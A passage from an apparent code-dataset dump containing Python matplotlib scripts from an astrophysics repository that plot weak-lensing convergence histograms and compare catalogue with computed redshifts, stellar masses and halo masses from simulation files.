%s0)\nplt.plot(kappa_values[:-1],smooth(kappa_2,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle='--', label ='%s; $45: 1,\\gamma_c,z/r$' %s2)\nplt.plot(kappa_values[:-1],smooth(kappa_3,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,1/r$' %s3)\nplt.plot(kappa_values[:-1],smooth(kappa_6,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,z/r$' %s6)\n#plt.plot(kappa_values[:-1],smooth(kappa_1,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='--', label ='%s; $45: 1,\\gamma_c,z; 120:1,z$' %s1)\nplt.plot(kappa_values[:-1],smooth(kappa_4,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,1/r; 45:1,1/r$' %s4)\nplt.plot(kappa_values[:-1],smooth(kappa_5,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,1/r; 45:1,z/r$' %s5)\n\nplt.plot(kappa_values[:-1],smooth(kappa_7,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,1/r$' %s7)\nplt.plot(kappa_values[:-1],smooth(kappa_9,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,z/r$' %s9)\nplt.plot(kappa_values[:-1],smooth(kappa_13,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,1/r$' %s13)\nplt.plot(kappa_values[:-1],smooth(kappa_16,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,z/r$' %s16)\n#plt.plot(kappa_values[:-1],smooth(kappa_8,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,z; 120:1,z$' %s8)\nplt.plot(kappa_values[:-1],smooth(kappa_10,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='y', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,z/r; 120:1,z/r$' %s10)\nplt.plot(kappa_values[:-1],smooth(kappa_14,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,1/r; 45:1,1/r$' 
%s14)\nplt.plot(kappa_values[:-1],smooth(kappa_15,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,1/r; 45:1,z/r$' %s15)\n\nplt.xlabel(r'$\\kappa$', fontsize=20)\nplt.ylabel(r'normalized counts', fontsize=20)\nplt.legend(loc=\"lower right\",fontsize=7)\nplt.title(\"Convergence distributions using De Lucia & Blaizot (2007) galaxies\",fontsize=13)\nplt.savefig('%skappahist_handpicked.png' % root, dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5532479286193848, "alphanum_fraction": 0.610701322555542, "avg_line_length": 33.968326568603516, "blob_id": "b124da42794ba1fa7a6ce327fbac7175d0e6eb51", "content_id": "e0401ad7de5f9749de56ac6f00daa2f35347e13a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15456, "license_type": "no_license", "max_line_length": 254, "num_lines": 442, "path": "/python/plot_utilities/plot_photozmstarmhalodensity.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot for catalogue vs. computed values of redshift, stellar masses and halo masses\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n\nfont = 10\nticksize = 10\n\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nax1 = fig.add_subplot(3,2,1)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(1, 8), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 1.66\noutlim = 0.15\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)/(1+x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects; outliers\" % (len(x))\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\nxx = np.linspace(-0.15, 20, 1000)\nxxx = np.linspace(0.15, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(xx, 0.85*xx-0.15, 'r--')\nplt.plot(xxx, 1.15*xxx+0.15, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, 
color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue', fontsize=font)\nplt.ylabel('photoz ugrizJHK', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(0, zlim)\nplt.ylim(0, zlim)\n#plt.title(' ugriJHK catalogue - pdz')\n\n\n\nax1 = fig.add_subplot(3,2,2)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugriz.images_forNAOJ.txt\" % (i,j,k), usecols=(1, 8), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 1.66\noutlim = 0.15\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)/(1+x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % (len(x))\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\nxx = np.linspace(-0.15, 20, 1000)\nxxx = np.linspace(0.15, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(xx, 0.85*xx-0.15, 'r--')\nplt.plot(xxx, 1.15*xxx+0.15, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue', fontsize=font)\nplt.ylabel('photoz ugriz', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(0, zlim)\nplt.ylim(0, zlim)\n#plt.title(' ugriz catalogue - pdz')\n\n\n\nax1 = fig.add_subplot(3,2,3)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(5, 10), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 12\nzlim_ = 7\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = 
np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_\\star$ ugriJHK', fontsize=font)\nplt.ylabel('measured $\\log M_\\star$ ugriJHK', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriJHK catalogue - measured Mstar')\n\n\n\nax1=plt.subplot(3,2,4)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugriz.images_forNAOJ.txt\" % (i,j,k), usecols=(5, 9), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim_ = 7\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ndelta = y-x\ncolorbar()\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, 
color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_\\star$ ugriz', fontsize=font)\nplt.ylabel('measured $\\log M_\\star$ ugriz', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriz catalogue - measured Mstar')\n\nax1 = fig.add_subplot(3,2,5)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(4, 12), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 14.5\nzlim_ = 10\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_{halo}$ ugriJHK', fontsize=font)\nplt.ylabel('measured $\\log M_{halo}$ ugriJHK', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriJHK catalogue - measured Mstar')\n\n\nax1=plt.subplot(3,2,6)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugriz.images_forNAOJ.txt\" % (i,j,k), usecols=(4, 10), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 14.5\nzlim_ = 10\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, 
bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ndelta = y-x\ncolorbar()\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_{halo}$ ugriz', fontsize=font)\nplt.ylabel('measured $\\log M_{halo}$ ugriz', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriz catalogue - measured Mstar')\n\n#cbaxes = fig.add_axes([0.8, 0.1, 0.03, 0.8])\n#cb = plt.colorbar(ax1, cax = cbaxes)\n\n#fig.subplots_adjust(right=0.8)\n#cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])\n#fig.colorbar(im, cax=cbar_ax)\n\n#plt.subplots_adjust(left=0.1, bottom=0.1, right=0.80, top=0.90, wspace=0.4, hspace=0.4)\n#plt.tight_layout()\nplt.savefig('/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/WFI2033_photoz_Mstar_Mhalo.png' , dpi=250)\n" }, { "alpha_fraction": 0.58349609375, "alphanum_fraction": 0.6722005009651184, "avg_line_length": 55.86111068725586, "blob_id": "1ad3033978eac3e17a0a980a5ce0ee84574c2aa1", "content_id": "6b8b2a4a1e51e4ec41d4ac471cf32c20c0fe9984", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6144, "license_type": "no_license", "max_line_length": 173, "num_lines": 108, "path": "/python/kappaplotcustom.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\n# run from the Guo_galaxies folder as: python /Users/perseus/Dropbox/Davis_work/code/kappaplotcustom.py\n\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import 
linspace\n\nfile1=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_orig_size45_i24_ratioquick_kappa.dat\"\nfile2=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size45_i24_ratioquick_gal_2.0_0.2_kappa.dat\"\nfile3=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size45_i24_ratioquick_gal_2.0_0.2_oneoverr_2.2_0.2_kappa.dat\"\nfile4=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size45_i24_ratioquick_gal_2.0_0.2_oneoverr_2.2_0.2_massoverr_4.0_1.0_kappa.dat\"\n\ndata1 = np.loadtxt(file1)\ndata2 = np.loadtxt(file2)\ndata3 = np.loadtxt(file3)\ndata4 = np.loadtxt(file4)\nkappa1=data1.T\nkappa2=data2.T\nkappa3=data3.T\nkappa4=data4.T\n\n\n\noutput=str(file1)[0:len(str(file1))-21]+\"_custom_gal_oneoverr_mass.eps\"\nBINS=100\nplt.suptitle(r'%s' % output[68:len(str(file1))-21], fontsize=15, y=0.998)\n#x = linspace(0,2,500)\n#plt.subplot(451)\n#n_q, bins_q, patches = plt.hist(q, histtype='step', color='b', label='W4sim', linewidth=0.5, normed=1, bins=BINS, range=[0, rangemax])\nplt.subplot(1,1,1)\nif file1[101:len(file1)-10]!=\"\":\n plt.hist(kappa1, histtype='step', color='b', label=\"No constraints\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa1, histtype='step', color='b', label=\"No constraints\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nif file3[101:len(file3)-10]!=\"\":\n plt.hist(kappa3, histtype='step', color='g', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa3, histtype='step', color='g', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nif file2[101:len(file2)-10]!=\"\":\n plt.hist(kappa2, histtype='step', color='r', label=\"ratios: count 2.0$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa2, histtype='step', color='r', label=\"ratios: count 2.0$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nif file4[101:len(file4)-10]!=\"\":\n plt.hist(kappa4, histtype='step', color='m', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2 $M/r$ 4.1$\\pm$1.0\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa4, histtype='step', color='m', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2 $M/r$ 4.1$\\pm$1.0\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n\n#if file1[101:len(file1)-10]!=\"\":\n# plt.hist(kappa1, histtype='step', color='b', label=file1[101:len(file1)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa1, histtype='step', color='b', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#if file3[101:len(file3)-10]!=\"\":\n# plt.hist(kappa3, histtype='step', color='g', label=file3[101:len(file3)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa3, histtype='step', color='g', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#if file4[101:len(file4)-10]!=\"\":\n# plt.hist(kappa4, histtype='step', color='m', label=file4[101:len(file4)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa4, histtype='step', color='m', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#if file2[101:len(file2)-10]!=\"\":\n# plt.hist(kappa2, histtype='step', color='r', label=file2[101:len(file2)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 
0.2])\n#else:\n# plt.hist(kappa2, histtype='step', color='r', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#plt.hist(kappa4, histtype='step', color='m', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nax=plt.subplot(111)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa1),517500)\nax.text(0.3, 0.75, s, fontsize=15, color='b',transform=ax.transAxes)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa2),len(kappa2))\nax.text(0.3, 0.70, s, fontsize=15, color='r',transform=ax.transAxes)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa3),len(kappa3))\nax.text(0.3, 0.65, s, fontsize=15, color='g',transform=ax.transAxes)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa4),len(kappa4))\nax.text(0.3, 0.60, s, fontsize=15, color='m',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa1),np.std(kappa1),len(kappa1))\n#ax.text(0.3, 0.75, s, fontsize=15, color='b',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa2),np.std(kappa2),len(kappa2))\n#ax.text(0.3, 0.70, s, fontsize=15, color='r',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa3),np.std(kappa3),len(kappa3))\n#ax.text(0.3, 0.65, s, fontsize=15, color='g',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa4),np.std(kappa4),len(kappa4))\n#ax.text(0.3, 0.60, s, fontsize=15, 